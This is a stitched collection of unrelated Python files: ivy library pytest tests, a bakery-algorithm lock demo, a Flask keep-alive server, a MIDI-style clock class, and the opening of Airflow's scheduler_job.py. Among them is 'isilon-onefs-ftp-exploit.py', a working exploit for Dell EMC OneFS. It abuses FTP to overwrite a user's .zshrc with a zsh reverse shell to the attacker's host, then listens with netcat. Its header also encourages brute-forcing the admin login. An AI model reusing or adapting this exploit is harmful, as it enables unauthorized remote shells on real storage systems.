"inds_n_upd_n_shape", [([[4], [3], [1], [7]], [9, 10, 11, 12], [8]), ([[0, 1, 2]], [1], [3, 3, 3]),
([[0], [2]], [[[5, 5, 5, 5], [6, 6, 6, 6], [7, 7, 7, 7], [8, 8, 8, 8]],
[[5, 5, 5, 5], [6, 6, 6, 6], [7, 7, 7, 7], [8, 8, 8, 8]]], [4, 4, 4])])
@pytest.mark.parametrize(
"red", ['sum', 'min', 'max', 'replace'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_scatter_nd(inds_n_upd_n_shape, red, dtype, tensor_fn, dev, call):
# smoke test
if (red == 'sum' or red == 'min' or red == 'max') and call is helpers.mx_call:
# mxnet does not support sum, min or max reduction for scattering
pytest.skip()
if red == 'replace' and call is not helpers.mx_call:
# mxnet is the only backend which supports the replace reduction
pytest.skip()
inds, upd, shape = inds_n_upd_n_shape
inds = ivy.array(inds, 'int32', dev)
upd = tensor_fn(upd, dtype, dev)
ret = ivy.scatter_nd(inds, upd, shape, red, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == tuple(shape)
if red == 'replace':
return
# value test
assert np.allclose(call(ivy.scatter_nd, inds, upd, shape, red, dev),
np.asarray(ivy.functional.backends.numpy.scatter_nd(ivy.to_numpy(inds), ivy.to_numpy(upd), shape, red)))
# compilation test
if call in [helpers.torch_call]:
# global torch_scatter var not supported when scripting
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.scatter_nd)
# gather
@pytest.mark.parametrize(
"prms_n_inds_n_axis", [([9, 8, 7, 6, 5, 4, 3, 2, 1, 0], [0, 4, 7], 0),
([[1, 2], [3, 4]], [[0, 0], [1, 0]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_gather(prms_n_inds_n_axis, dtype, tensor_fn, dev, call):
# smoke test
prms, inds, axis = prms_n_inds_n_axis
prms = tensor_fn(prms, dtype, dev)
inds = ivy.array(inds, 'int32', dev)
ret = ivy.gather(prms, inds, axis, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == inds.shape
# value test
assert np.allclose(call(ivy.gather, prms, inds, axis, dev),
np.asarray(ivy.functional.backends.numpy.gather(ivy.to_numpy(prms), ivy.to_numpy(inds), axis)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.gather)
# gather_nd
@pytest.mark.parametrize(
"prms_n_inds", [([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[0, 1], [1, 0]]),
([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[[0, 1]], [[1, 0]]]),
([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[[0, 1, 0]], [[1, 0, 1]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_gather_nd(prms_n_inds, dtype, tensor_fn, dev, call):
# smoke test
prms, inds = prms_n_inds
prms = tensor_fn(prms, dtype, dev)
inds = ivy.array(inds, 'int32', dev)
ret = ivy.gather_nd(prms, inds, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == inds.shape[:-1] + prms.shape[inds.shape[-1]:]
# value test
assert np.allclose(call(ivy.gather_nd, prms, inds, dev),
np.asarray(ivy.functional.backends.numpy.gather_nd(ivy.to_numpy(prms), ivy.to_numpy(inds))))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.gather_nd)
# linear_resample
@pytest.mark.parametrize(
"x_n_samples_n_axis_n_y_true", [([[10., 9., 8.]], 9, -1, [[10., 9.75, 9.5, 9.25, 9., 8.75, 8.5, 8.25, 8.]]),
([[[10., 9.], [8., 7.]]], 5, -2,
[[[10., 9.], [9.5, 8.5], [9., 8.], [8.5, 7.5], [8., 7.]]]),
([[[10., 9.], [8., 7.]]], 5, -1,
[[[10., 9.75, 9.5, 9.25, 9.], [8., 7.75, 7.5, 7.25, 7.]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_linear_resample(x_n_samples_n_axis_n_y_true, dtype, tensor_fn, dev, call):
# smoke test
x, samples, axis, y_true = x_n_samples_n_axis_n_y_true
x = tensor_fn(x, dtype, dev)
ret = ivy.linear_resample(x, samples, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = list(x.shape)
num_x_dims = len(x_shape)
axis = axis % num_x_dims
x_pre_shape = x_shape[0:axis]
num_vals = x.shape[axis]
x_post_shape = x_shape[axis+1:]
assert list(ret.shape) == x_pre_shape + [samples] + x_post_shape
# value test
y_true = np.array(y_true)
y = call(ivy.linear_resample, x, samples, axis)
assert np.allclose(y, y_true)
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.linear_resample)
# exists
@pytest.mark.parametrize(
"x", [[1.], None, [[10., 9., 8.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_exists(x, dtype, tensor_fn, dev, call):
# smoke test
x = tensor_fn(x, dtype, dev) if x is not None else None
ret = ivy.exists(x)
# type test
assert isinstance(ret, bool)
# value test
y_true = x is not None
assert ret == y_true
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.exists)
# default
@pytest.mark.parametrize(
"x_n_dv", [([1.], [2.]), (None, [2.]), ([[10., 9., 8.]], [2.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_default(x_n_dv, dtype, tensor_fn, dev, call):
x, dv = x_n_dv
# smoke test
x = tensor_fn(x, dtype, dev) if x is not None else None
dv = tensor_fn(dv, dtype, dev)
ret = ivy.default(x, dv)
# type test
assert ivy.is_array(ret)
# value test
y_true = ivy.to_numpy(x if x is not None else dv)
assert np.allclose(call(ivy.default, x, dv), y_true)
# compilation test
if call is helpers.torch_call:
# try-except blocks are not jit compilable in pytorch
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.default)
# dtype
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype(x, dtype, tensor_fn, dev, call):
# smoke test
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.dtype(x)
# type test
assert isinstance(ret, ivy.Dtype)
# dtype_to_str
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ['float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_to_str(x, dtype, tensor_fn, dev, call):
# smoke test
if call is helpers.mx_call and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call is helpers.jnp_call and dtype in ['int64', 'float64']:
# jax does not support int64 or float64 arrays
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
dtype_as_str = ivy.dtype(x, as_str=True)
dtype_to_str = ivy.dtype_to_str(ivy.dtype(x))
# type test
assert isinstance(dtype_as_str, str)
assert isinstance(dtype_to_str, str)
# value test
assert dtype_to_str == dtype_as_str
# dtype_from_str
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ['float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_from_str(x, dtype, tensor_fn, dev, call):
# smoke test
if call is helpers.mx_call and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call is helpers.jnp_call and dtype in ['int64', 'float64']:
# jax does not support int64 or float64 arrays
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
dt0 = ivy.dtype_from_str(ivy.dtype(x, as_str=True))
dt1 = ivy.dtype(x)
# value test
assert dt0 is dt1
def test_cache_fn(dev, call):
def func():
return ivy.random_uniform()
# return a single cached_fn and then query this
cached_fn = ivy.cache_fn(func)
ret0 = cached_fn()
ret0_again = cached_fn()
ret1 = func()
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# call ivy.cache_fn repeatedly, the new cached functions each use the same global dict
ret0 = ivy.cache_fn(func)()
ret0_again = ivy.cache_fn(func)()
ret1 = func()
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
def test_cache_fn_with_args(dev, call):
def func(_):
return ivy.random_uniform()
# return a single cached_fn and then query this
cached_fn = ivy.cache_fn(func)
ret0 = cached_fn(0)
ret0_again = cached_fn(0)
ret1 = cached_fn(1)
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# call ivy.cache_fn repeatedly, the new cached functions each use the same global dict
ret0 = ivy.cache_fn(func)(0)
ret0_again = ivy.cache_fn(func)(0)
ret1 = ivy.cache_fn(func)(1)
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
def test_framework_setting_with_threading(dev, wrapped_mode, call):
if wrapped_mode:
        # ToDo: get this test passing in wrapped mode
pytest.skip()
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
def thread_fn():
ivy.set_framework('numpy')
x_ = np.array([0., 1., 2.])
for _ in range(2000):
try:
ivy.reduce_mean(x_)
except TypeError:
return False
ivy.unset_framework()
return True
# get original framework string and array
fws = ivy.current_framework_str()
x = ivy.array([0., 1., 2.])
# start numpy loop thread
thread = threading.Thread(target=thread_fn)
thread.start()
# start local original framework loop
ivy.set_framework(fws)
for _ in range(2000):
ivy.reduce_mean(x)
ivy.unset_framework()
assert not thread.join()
def test_framework_setting_with_multiprocessing(dev, call):
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
def worker_fn(out_queue):
ivy.set_framework('numpy')
x_ = np.array([0., 1., 2.])
for _ in range(1000):
try:
ivy.reduce_mean(x_)
except TypeError:
out_queue.put(False)
return
ivy.unset_framework()
out_queue.put(True)
# get original framework string and array
fws = ivy.current_framework_str()
x = ivy.array([0., 1., 2.])
# start numpy loop thread
output_queue = multiprocessing.Queue()
worker = multiprocessing.Process(target=worker_fn, args=(output_queue,))
worker.start()
# start local original framework loop
ivy.set_framework(fws)
for _ in range(1000):
ivy.reduce_mean(x)
ivy.unset_framework()
worker.join()
assert output_queue.get_nowait()
def test_explicit_ivy_framework_handles(dev, call):
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
# store original framework string and unset
fw_str = ivy.current_framework_str()
ivy.unset_framework()
# set with explicit handle caught
ivy_exp = ivy.get_framework(fw_str)
assert ivy_exp.current_framework_str() == fw_str
# assert backend implemented function is accessible
assert 'array' in ivy_exp.__dict__
assert callable(ivy_exp.array)
# assert joint implemented function is also accessible
assert 'cache_fn' in ivy_exp.__dict__
assert callable(ivy_exp.cache_fn)
# set global ivy to numpy
ivy.set_framework('numpy')
# assert the explicit handle is still unchanged
assert ivy.current_framework_str() == 'numpy'
assert ivy_exp.current_framework_str() == fw_str
# unset global ivy from numpy
ivy.unset_framework()
def test_class_ivy_handles(dev, wrapped_mode, call):
if wrapped_mode:
# ToDo: get this test passing
pytest.skip()
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
class ArrayGen:
def __init__(self, ivyh):
self._ivy = ivyh
def get_array(self):
return self._ivy.array([0., 1., 2.])
# create instance
ag = ArrayGen(ivy.get_framework())
# create array from array generator
x = ag.get_array()
# verify this is not a numpy array
assert not isinstance(x, np.ndarray)
# change global framework to numpy
ivy.set_framework('numpy')
# create another array from array generator
x = ag.get_array()
# verify this is not still a numpy array
assert not isinstance(x, np.ndarray)
# einops_rearrange
@pytest.mark.parametrize(
"x_n_pattern_n_newx", [([[0., 1., 2., 3.]], 'b n -> n b', [[0.], [1.], [2.], [3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_rearrange(x_n_pattern_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, new_x = x_n_pattern_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_rearrange(x, pattern)
true_ret = einops.rearrange(ivy.to_native(x), pattern)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# compilation test
if call is helpers.torch_call:
# torch jit cannot compile **args
pytest.skip()
if not ivy.array_mode():
helpers.assert_compilable(ivy.einops_rearrange)
# einops_reduce
@pytest.mark.parametrize(
"x_n_pattern_n_red_n_newx", [([[0., 1., 2., 3.]], 'b n -> b', 'mean', [1.5])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_reduce(x_n_pattern_n_red_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, reduction, new_x = x_n_pattern_n_red_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_reduce(x, pattern, reduction)
true_ret = einops.reduce(ivy.to_native(x), pattern, reduction)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# compilation test
if call is helpers.torch_call:
# torch jit cannot compile **args
pytest.skip()
if not ivy.array_mode():
helpers.assert_compilable(ivy.einops_reduce)
# einops_repeat
@pytest.mark.parametrize(
"x_n_pattern_n_al_n_newx", [([[0., 1., 2., 3.]], 'b n -> b n c', {'c': 2},
[[[0., 0.], [1., 1.], [2., 2.], [3., 3.]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_repeat(x_n_pattern_n_al_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, axes_lengths, new_x = x_n_pattern_n_al_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_repeat(x, pattern, **axes_lengths)
true_ret = einops.repeat(ivy.to_native(x), pattern, **axes_lengths)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# compilation test
if call is helpers.torch_call:
# torch jit cannot compile **args
pytest.skip()
if not ivy.array_mode():
helpers.assert_compilable(ivy.einops_repeat)
# profiler
def test_profiler(dev, call):
# ToDo: find way to prevent this test from hanging when run alongside other tests in parallel
# log dir
this_dir = os.path.dirname(os.path.realpath(__file__))
log_dir = os.path.join(this_dir, '../log')
# with statement
with ivy.Profiler(log_dir):
a = ivy.ones([10])
b = ivy.zeros([10])
a + b
if call is helpers.mx_call:
time.sleep(1) # required by MXNet for some reason
# start and stop methods
profiler = ivy.Profiler(log_dir)
profiler.start()
a = ivy.ones([10])
b = ivy.zeros([10])
a + b
profiler.stop()
if call is helpers.mx_call:
time.sleep(1) # required by MXNet for some reason
# container types
def test_container_types(dev, call):
cont_types = ivy.container_types()
assert isinstance(cont_types, list)
for cont_type in cont_types:
assert hasattr(cont_type, 'keys')
assert hasattr(cont_type, 'values')
assert hasattr(cont_type, 'items')
def test_inplace_arrays_supported(dev, call):
cur_fw = ivy.current_framework_str()
if cur_fw in ['numpy', 'mxnet', 'torch']:
assert ivy.inplace_arrays_supported()
elif cur_fw in ['jax', 'tensorflow']:
assert not ivy.inplace_arrays_supported()
else:
raise Exception('Unrecognized framework')
def test_inplace_variables_supported(dev, call):
cur_fw = ivy.current_framework_str()
if cur_fw in ['numpy', 'mxnet', 'torch', 'tensorflow']:
assert ivy.inplace_variables_supported()
elif cur_fw in ['jax']:
assert not ivy.inplace_variables_supported()
else:
raise Exception('Unrecognized framework')
@pytest.mark.parametrize(
"x_n_new", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_inplace_update(x_n_new, tensor_fn, dev, wrapped_mode, call):
if wrapped_mode:
# ToDo: add support for inplace updates in wrapped mode
pytest.skip()
x_orig, new_val = x_n_new
if call is helpers.mx_call and isinstance(x_orig, Number):
# MxNet supports neither 0-dim variables nor 0-dim inplace updates
pytest.skip()
x_orig = tensor_fn(x_orig, 'float32', dev)
new_val = tensor_fn(new_val, 'float32', dev)
if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
(tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
x = ivy.inplace_update(x_orig, new_val)
assert id(x) == id(x_orig)
assert np.allclose(ivy.to_numpy(x), ivy.to_numpy(new_val))
return
pytest.skip()
@pytest.mark.parametrize(
"x_n_dec", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_inplace_decrement(x_n_dec, tensor_fn, dev, wrapped_mode, call):
if wrapped_mode:
# ToDo: add support for inplace decrements in wrapped mode
pytest.skip()
x_orig, dec = x_n_dec
if call is helpers.mx_call and isinstance(x_orig, Number):
# MxNet supports neither 0-dim variables nor 0-dim inplace updates
pytest.skip()
x_orig = tensor_fn(x_orig, 'float32', dev)
dec = tensor_fn(dec, 'float32', dev)
new_val = x_orig - dec
if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
(tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
x = ivy.inplace_decrement(x_orig, dec)
assert id(x) == id(x_orig)
assert np.allclose(ivy.to_numpy(new_val), ivy.to_numpy(x))
return
pytest.skip()
@pytest.mark.parametrize(
"x_n_inc", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_inplace_increment(x_n_inc, tensor_fn, dev, wrapped_mode, call):
if wrapped_mode:
# ToDo: add support for inplace increments in wrapped mode
pytest.skip()
x_orig, inc = x_n_inc
if call is helpers.mx_call and isinstance(x_orig, Number):
# MxNet supports neither 0-dim variables nor 0-dim inplace updates
pytest.skip()
x_orig = tensor_fn(x_orig, 'float32', dev)
inc = tensor_fn(inc, 'float32', dev)
new_val = x_orig + inc
if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
(tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
x = ivy.inplace_increment(x_orig, inc)
assert id(x) == id(x_orig)
assert np.allclose(ivy.to_numpy(new_val), ivy.to_numpy(x))
return
pytest.skip()
|
bakery_algorithm.py
|
from time import sleep
from random import randint
from threading import Thread
LOWEST_PRIORITY = 0
NUM_THREADS = 100
def lock(tid, entering, tickets):
# The entering list is required for the edge case where two threads end up
    # getting the same ticket value, and one with lower priority (higher tid)
# ends up going to the critical section first. Then when the higher priority
# thread runs it will also get into the critical section.
entering[tid] = True
tickets[tid] = max(tickets) + 1
entering[tid] = False
for j in range(len(entering)):
while entering[j]:
thread_yield()
while tickets[j] != 0 and (tickets[tid], tid) > (tickets[j], j):
thread_yield()
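# Note (added sketch, not part of the original algorithm): the tuple comparison
# above breaks ties by thread id. If two threads draw the same ticket, e.g.
# (tickets[tid], tid) = (5, 3) and (tickets[j], j) = (5, 1), then (5, 3) > (5, 1)
# is True, so thread 3 keeps yielding until thread 1 resets its ticket in unlock().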
def unlock(tid, tickets):
    tickets[tid] = LOWEST_PRIORITY
def compute(tid, entering, tickets):
    lock(tid, entering, tickets)
    # Critical section
    print('hello world')
    unlock(tid, tickets)
def thread_yield():
sleep(0.1)
if __name__ == '__main__':
entering = [False] * NUM_THREADS
tickets = [LOWEST_PRIORITY] * NUM_THREADS
threads = [Thread(target=compute, args=(tid, entering, tickets))
for tid in range(NUM_THREADS)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
|
isilon-onefs-ftp-exploit.py
|
#!/usr/bin/env python
#
# Exploit name : isilon-onefs-ftp-exploit.py
# Created date : 9/21/18
# Submit Date : 10/10/18
# Author : wetw0rk
# Header Wizard BOI : loganbest
# Python version : 2.7
# Brute Force Script: https://github.com/wetw0rk/Exploit-Development/blob/master/DELL%20EMC%20OneFS%20Storage%20Administration%20%3C%208.1.2.0/isilon-onefs-brute.py
# Vendor Homepage : https://www.dellemc.com/en-us/storage/isilon/onefs-operating-system.htm
# Software Link : https://downloads.emc.com/emc-com/usa/Isilon/EMC_Isilon_OneFS_8.1.2.0_Simulator.zip
# Tested on : DELL EMC OneFS Storage Administration 8.1.2.0
#
# Greetz: Hima (thanks for helping me think of .bashrc), Fr13ndzSec, AbeSnowman, Berserk, Neil
#
# [------------ Timeline ------------]
# 9/21/18 - Contacted Dell PSIRT
# 9/25/18 - Sent POC code
# 10/9/18 - Responded with "not considered a vulnerability"
#
# Description :
# To exploit this vulnerability first you must gain access to the administrative
# interface on 8080 (note no lockouts so you can bruteforce E Z). Once in, enable
# FTP like so:
# -> Protocols -> FTP Settings -> Enable the service and transfers -> With that done, exploit!
#
# Since you're dropped in the user home directory and not a secluded FTP directory
# you can inject into .zshrc; however, as Dell stated, you can access other files on
# the system as well....
#
import os
import sys
import socket
import threading
RED = "\033[1m\033[31m[-]\033[0m"
BLUE = "\033[1m\033[94m[*]\033[0m"
GREEN = "\033[1m\033[92m[+]\033[0m"
def background_server(lhost):
global check
fd = open(".zshrc", 'w')
host = "0.0.0.0"
port = 50121
sock = socket.socket(
socket.AF_INET,
socket.SOCK_STREAM
)
sock.bind((host, port))
sock.listen(5)
print("%s listening on %s:%s" % (BLUE, host,port))
while True:
conn, addr = sock.accept()
if check != 1:
zshrc_file = conn.recv(4096)
print("%s generating .zshrc payload" % BLUE)
fd.write(zshrc_file)
# msfvenom -a cmd --platform unix -p cmd/unix/reverse_zsh LHOST=192.168.245.136 LPORT=443 -f raw
fd.write("zsh -c 'zmodload zsh/net/tcp && ztcp %s 443 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY' &\n" % lhost)
fd.close()
else:
with open('.zshrc', 'r') as myfile:
data=myfile.read()
conn.send(data)
try:
rhost = sys.argv[1]
rport = int(sys.argv[2])
lhost = sys.argv[3]
username = sys.argv[4]
password = sys.argv[5]
except:
print("Usage: ./%s <rhost> <rport> <lhost> <username> <password>" % sys.argv[0])
print("Example: ./%s 192.168.245.3 21 192.168.245.136 admin admin" % sys.argv[0])
exit(0)
check = 0 # start a background server for download+uploads
server_thread = threading.Thread(target=background_server, args=(lhost,))
server_thread.start()
# create a socket for the client sending the commands
print("%s connecting to %s:%s" % (BLUE, rhost, rport))
csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect((rhost, rport))
csock.recv(4096)
print("%s performing login to OneFS using %s:%s" % (BLUE, username, password))
csock.send("USER %s\r\n" % username)
csock.recv(4096)
csock.send("PASS %s\r\n" % password)
csock.recv(4096)
print("%s login was successful downloading .zshrc" % GREEN)
csock.send("PORT %s,195,201\r\n" % lhost.replace(".", ",")) # have port on 50121
csock.recv(4096)
csock.send("RETR .zshrc\r\n")
csock.recv(4096)
csock.send("RNFR .zshrc\r\n")
csock.recv(4096)
print("%s renaming remote .zshrc to .backup" % GREEN)
csock.send("RNTO .backup\r\n")
csock.recv(4096)
check = 1
print("%s uploading payload to target host" % GREEN)
csock.send("PORT %s,195,201\r\n" % lhost.replace(".", ",")) # have port on 50121
csock.recv(4096)
csock.send("TYPE I\r\n")
csock.recv(4096)
csock.send("STOR .zshrc\r\n")
print("%s exploitation complete waiting for %s to login" % (GREEN, username))
os.system("nc -lvp 443")
csock.close()
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return "Your bot is alive!"
def run():
app.run(host="0.0.0.0", port=8080)
def keep_alive():
server = Thread(target=run)
server.start()
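# Minimal usage sketch (hedged: the module name keep_alive.py and the bot entry
# point below are assumptions, not part of this file):
#   from keep_alive import keep_alive
#   keep_alive()      # serves "/" on 0.0.0.0:8080 in a background thread
#   start_bot()       # hypothetical long-running work that keeps the process alive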
|
clock.py
|
from ..constants import DEFAULT_TEMPO, DEFAULT_TICKS_PER_BEAT, MIN_CLOCK_DELAY_WARNING_TIME
from ..util import make_clock_multiplier
import time
import logging
import threading
log = logging.getLogger(__name__)
#----------------------------------------------------------------------
# A Clock is relied upon to generate accurate tick() events every
# fraction of a note. It should handle millisecond-level jitter
# internally - ticks should always be sent out on time!
#
# Period, in seconds, corresponds to a 24th crotchet (1/96th of a bar),
# as per MIDI
#----------------------------------------------------------------------
class Clock:
def __init__(self,
clock_target=None,
tempo=DEFAULT_TEMPO,
ticks_per_beat=DEFAULT_TICKS_PER_BEAT):
self.clock_target = clock_target
self.tick_duration_seconds = None
self.tick_duration_seconds_orig = None
self._tempo = tempo
self.ticks_per_beat = ticks_per_beat
self.warpers = []
self.accelerate = 1.0
self.thread = None
self.running = False
target_ticks_per_beat = self.clock_target.ticks_per_beat if self.clock_target else ticks_per_beat
self.clock_multiplier = make_clock_multiplier(target_ticks_per_beat, self.ticks_per_beat)
def _calculate_tick_duration(self):
self.tick_duration_seconds = 60.0 / (self.tempo * self.ticks_per_beat)
self.tick_duration_seconds_orig = self.tick_duration_seconds
def get_ticks_per_beat(self):
return self._ticks_per_beat
def set_ticks_per_beat(self, ticks_per_beat):
self._ticks_per_beat = ticks_per_beat
self._calculate_tick_duration()
ticks_per_beat = property(get_ticks_per_beat, set_ticks_per_beat)
def get_tempo(self):
return self._tempo
def set_tempo(self, tempo):
self._tempo = tempo
self._calculate_tick_duration()
tempo = property(get_tempo, set_tempo)
def background(self):
""" Run this Timeline in a background thread. """
self.thread = threading.Thread(target=self.run)
self.thread.setDaemon(True)
self.thread.start()
def run(self):
clock0 = clock1 = time.time() * self.accelerate
#------------------------------------------------------------------------
# Allow a tick to elapse before we call tick() for the first time
# to keep Warp patterns in sync
#------------------------------------------------------------------------
self.running = True
while self.running:
if clock1 - clock0 >= (2.0 * self.tick_duration_seconds):
delay_time = (clock1 - clock0 - self.tick_duration_seconds * 2)
if delay_time > MIN_CLOCK_DELAY_WARNING_TIME:
log.warning("Clock: Timer overflowed (late by %.3fs)" % delay_time)
while clock1 - clock0 >= self.tick_duration_seconds:
#------------------------------------------------------------------------
# Time for a tick.
# Use while() because multiple ticks might need to be processed if the
# clock has overflowed.
#------------------------------------------------------------------------
ticks = next(self.clock_multiplier)
for tick in range(ticks):
self.clock_target.tick()
clock0 += self.tick_duration_seconds
self.tick_duration_seconds = self.tick_duration_seconds_orig
for warper in self.warpers:
warp = next(warper)
#------------------------------------------------------------------------
# map [-1..1] to [0.5, 2]
# - so -1 doubles the tempo, +1 halves it
#------------------------------------------------------------------------
warp = pow(2, warp)
self.tick_duration_seconds *= warp
time.sleep(0.0001)
clock1 = time.time() * self.accelerate
def stop(self):
self.running = False
def warp(self, warper):
self.warpers.append(warper)
def unwarp(self, warper):
self.warpers.remove(warper)
class DummyClock (Clock):
"""
Clock subclass used in testing, which ticks at the highest rate possible.
"""
def run(self):
while True:
self.clock_target.tick()
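# Construction sketch (hedged: ClockTarget below is a stand-in, not part of this
# module; the real clock_target only needs a tick() method and a ticks_per_beat
# attribute, as used in Clock.__init__ and Clock.run above):
#   class ClockTarget:
#       ticks_per_beat = DEFAULT_TICKS_PER_BEAT
#       def tick(self):
#           pass  # advance the timeline by one tick
#   clock = Clock(clock_target=ClockTarget(), tempo=120)
#   clock.background()   # tick() is now called tempo * ticks_per_beat times per minute
#   clock.stop()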
|
scheduler_job.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import multiprocessing
import os
